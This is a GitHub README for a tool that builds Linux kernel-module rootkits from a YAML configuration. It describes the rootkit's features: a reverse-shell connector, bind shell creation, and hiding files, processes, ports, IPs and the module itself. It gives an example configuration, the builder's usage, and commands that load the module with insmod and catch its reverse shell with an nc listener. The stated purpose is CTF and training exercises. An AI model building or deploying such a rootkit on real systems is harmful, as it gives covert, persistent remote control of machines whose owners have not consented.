Skip to content

64-bit LKM Rootkit builder based on yaml prescription. Working on 5.15.5 kernel

License

Notifications You must be signed in to change notification settings

lukasbalazik/1337kit

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

30 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

1337kit - LKM Rootkit Builder

1337kit

About project

1337kit is 64-bit LKM Rootkit builder based on yaml prescription

Fully tested on: Linux 5.11.0-34-generic 20.04.1-Ubuntu x86_64 x86_64 x86_64 GNU/Linux

DISCLAIMER: FOR EDUCATIONAL AND INFORMATIONAL PURPOSES ONLY

This project is for malware analysts and for creator of CTF or cyber security exercises, with this builder you can build your custom rootkit for your exercise

I do not take any responsibility for usage of this project

Features

  • RevShell based connector
  • Hiding dents (files, files prefixes, process id)
  • Hiding connections based on Ports in TCP Connection
  • Hiding connections based on IPv4 in TCP Connection
  • Spawning scripts to user-space
  • Hiding module from module list

Installation

Builder requirements:

$ pip3 install -r requirements.txt

Install requirements for building LKM:

sudo apt-get install build-essential linux-headers-$(uname -r)

Usage

You have to create your yaml prescription for custom rootkit, Example of full prescription (every option can be omitted):

hideme: true
connector:
    ip: "127.0.0.1"
    port: "8080"
hide_dent: # Here you can put all your files, directories and process id you want to hide from user
    - "91746"
    - "1337test_"
hide_port:
    - "8080"
    - "1337"
hide_ip:
    - "127.0.0.1"
    - "8.8.8.8"
shells:
    - "sleep 1000"

After you create your yaml just run the builder.py

$ python3 builder.py --help
usage: builder.py [-h] [-c CONFIG] [-o [OBFUSCATE]]

Generate rootkit from yaml prescription

optional arguments:
  -h, --help            show this help message and exit
  -c CONFIG, --config CONFIG
                        Yaml prescription file
  -o [OBFUSCATE], --obfuscate [OBFUSCATE]
                        Enable rootkit symbols obfuscation

builder

And rootkit will be created.

another way to execute your hiding or shell script is connector, if you enable your connector, rev-sell connection is created to your defined IP and Port, after this it will try open connection every x second. After connection is opened multiple commands can be send:

  • HIDEME
  • SHOWME
  • HIDE_DENT
  • SHOW_HIDDEN_DENT
  • HIDE_PORT
  • SHOW_HIDDEN_PORT
  • HIDE_IP
  • SHOW_HIDDEN_IP
  • BINDSHELL_CREATE
  • RUN_CUSTOM_BASH

Future Features

  • TCP IPv6 hiding
  • UDP based hiding
  • Rootkit string encryption/obfuscation

Examples

$ python3 builder.py --config testfiles/config.yml
$ sudo insmod rootkit.ko
$ nc -lvnp 8080
 Listening on 0.0.0.0 8080
 Connection received on 127.0.0.1 39040
 RUN_CUSTOM_BASH sleep 1000

example